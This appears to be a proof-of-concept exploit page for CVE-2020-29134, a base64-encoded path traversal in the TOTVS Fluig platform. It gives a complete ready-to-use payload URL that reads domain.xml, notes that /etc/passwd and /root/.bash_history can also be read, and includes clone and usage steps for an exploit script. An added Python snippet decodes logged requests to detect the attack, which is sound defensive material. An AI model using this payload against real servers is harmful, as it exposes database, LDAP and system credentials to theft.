CVE-2020-29134 PoC — Totvs TOTVS Fluig Path Traversal Vulnerability

Associated Vulnerability
Title: Totvs TOTVS Fluig Path Traversal Vulnerability (CVE-2020-29134)
Description: The TOTVS Fluig platform allows path traversal through the parameter "file = .. /" encoded in base64. This affects all versions Fluig Lake 1.7.0, Fluig 1.6.5 and Fluig 1.6.4.
Description
Exploit CVE-2020-29134 - TOTVS Fluig Platform - Path Traversal
Readme
# Totvs Fluig Platform
     
     Fluig is the productivity and collaboration platform that integrates with the ERP system,
     and your company's other systems to revolutionize the way you and your team work.
 
# CVE-2020-29134
     
     The TOTVS Fluig platform allows path traversal via parameter encoded in base64.
     When exploited, this vulnerability allows the reading of sensitive XML files, which contain
     data to access the database and, in some cases, LDAP connections and ERP system integrations.
     In addition, it is also possible to read system files, such as /etc/passwd and /root/.bash_history.
     
#### Affected versions
    --
    <== Fluig Lake 1.7.0
    <== Fluig 1.6.5
    <== Fluig 1.6.4
    ...
#### Patched versions
    <== Fluig Lake 1.7.0-210303 (Patched)
    <== Fluig 1.6.5-210308 (Patched)
    <== Fluig 1.6.4-210308 (Patched)

# Building Payload

![alt text](https://raw.githubusercontent.com/lucxssouza/CVE-2020-29134/main/Payload-Parameter.png?raw=true)

#### Attack Vector
     http://fluig.host.com/volume/stream/Rmx1aWc=/
#### Path traversal plain text
     ?t=1&vol=Default&id=1&ver=1000&file=../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml
#### Path traversal encoded base64
     P3Q9MSZ2b2w9RGVmYXVsdCZpZD0xJnZlcj0xMDAwJmZpbGU9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZmx1aWcvYXBwc2VydmVyL2RvbWFpbi9jb25maWd1cmF0aW9uL2RvbWFpbi54bWw=
#### Payload 
     http://HOST.FLUIG.COM/volume/stream/Rmx1aWc=/P3Q9MSZ2b2w9RGVmYXVsdCZpZD0xJnZlcj0xMDAwJmZpbGU9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZmx1aWcvYXBwc2VydmVyL2RvbWFpbi9jb25maWd1cmF0aW9uL2RvbWFpbi54bWw=
     
#### Exploit-DB reference
     https://www.exploit-db.com/exploits/49622
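
Because the traversal string travels base64-encoded inside the URL path, a plain-text search for `../` in access logs does not match these requests. The following Python detection sketch is an added example, not part of the original repository or of xfluig.sh: it decodes the segment after `/volume/stream/<id>/` and flags a `file` value that contains a `..` component. The combined-log-style line format, the function names and the sample lines are assumptions constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, unquote

# Path shape from the README: /volume/stream/<segment>/<base64 of "?t=..&file=..">
STREAM_RE = re.compile(r"/volume/stream/[^/\s]+/([A-Za-z0-9+/_=%-]+)")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+)')

def decode_segment(segment):
    """Decode the base64 path segment to text; None if it is not valid base64."""
    raw = unquote(segment).replace("-", "+").replace("_", "/")
    raw += "=" * (-len(raw) % 4)  # tolerate stripped padding
    try:
        return base64.b64decode(raw, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None

def traversal_in_request(path):
    """Return the decoded `file` value if it has a ".." component, else None."""
    match = STREAM_RE.search(path)
    decoded = decode_segment(match.group(1)) if match else None
    if decoded is None:
        return None
    for value in parse_qs(decoded.lstrip("?")).get("file", []):
        # Second unquote catches double-encoded separators; split on / and \
        if ".." in re.split(r"[\\/]+", unquote(value)):
            return value
    return None

def scan(log_lines):
    """Return (client, decoded file value) for each flagged access-log line."""
    hits = []
    for line in log_lines:
        request = REQUEST_RE.search(line)
        found = traversal_in_request(request.group(1)) if request else None
        if found:
            hits.append((line.split()[0], found))
    return hits

def b64(text):  # helper used only to build the constructed samples below
    return base64.b64encode(text.encode()).decode()

# Constructed access-log lines (documentation IP ranges), not real traffic.
LINE = '{} - - [10/Mar/2021:10:00:00 +0000] "GET /volume/stream/Rmx1aWc=/{} HTTP/1.1" 200 512'
SAMPLE_LOG = [
    LINE.format("203.0.113.7", b64("?t=1&vol=Default&id=1&ver=1000&file=../../../etc/passwd")),
    LINE.format("198.51.100.9", b64("?t=1&vol=Default&id=1&ver=1000&file=report.pdf")),
]
```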

     
# Clone Repository

     # git clone https://github.com/lucxssouza/CVE-2020-29134.git
     # cd CVE-2020-29134
     # chmod +x xfluig.sh

# Usage

     Ex1: ./xfluig.sh http://fluig.host.com REQUESTS_WFUZZ (number of requests generated by wfuzz)

     Ex2: ./xfluig.sh http://fluig.host.com:PORT
File Snapshot

[4.0K] /data/pocs/ee7e735bb21bcd7728b81409543b7605436c1ecc
├── [192K] Payload-Parameter.png
├── [2.0K] README.md
└── [10.0K] xfluig.sh

0 directories, 3 files